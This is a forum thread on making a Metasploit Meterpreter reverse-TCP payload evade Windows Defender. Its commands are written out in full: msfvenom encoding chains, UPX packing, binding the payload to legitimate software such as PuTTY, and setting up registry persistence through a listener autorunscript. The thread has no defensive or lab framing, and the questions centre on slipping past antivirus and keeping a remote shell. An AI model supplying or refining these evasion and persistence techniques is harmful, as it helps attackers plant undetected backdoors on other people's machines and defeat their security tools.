Forum Thread: Windows Defender Pick Up My Payload

hi i need some help with creating an undetectable payload
the command i am using is
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.2 LPORT=4444 -f exe -e x86/shikata_ga_nai -i 200 > xxx.exe

after i create the payload i move it to a windows 10 64bit and it's immediately picked up.
i was wondering, maybe it's because of the x86 encoder? even when i use veil-evasion, windows defender gets it.
are there better encoders / crypters known in kali that i am missing?

the only way i get past my windows defender is by using shellter, but then i don't get a meterpreter shell back...

7 Responses

Use veil-evasion, very similar to msfvenom. In my experience it has a much higher success rate against AV.

i don't know why, but veil-evasion can't pass my windows defender

Well, the most straightforward solution would be to create your own shellcode and embed it into legit software (i.e. PuTTY). But what else you can do is encode it multiple times (like this:

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=31337 -f raw -e shikata_ga_nai -i 5 | msfvenom -a x86 --platform windows -e x86/alpha_upper -i 4 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 6 -f raw | msfvenom -a x86 --platform windows -e x86/countdown -i 5 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 9 -f raw | msfvenom -a x86 --platform windows -e x86/countdown -i 9 -f exe -o /root/.exe;upx -9 -v -o /root/.exe /root/.exe)

and add a -k option and add a program of your choice to run with the payload.

tried the script... windows defender still eats it up... any other suggestions?

combining the payload with a legitimate exe will get past defender. however, a persistent connection (as far as i know) requires the payload to be uncombined, and THAT gets chewed up by defender. any other ideas?

For persistence, use the Registry persistence exploit. Found in exploit/windows/local/registry_persistence

I like to set it up in the listener so it automatically gets persistence when a session is created. After typing your listener info and before typing exploit -j, type set autorunscript exploit/windows/local/registry_persistence Lhost=IP Lport=port

Then exploit -j
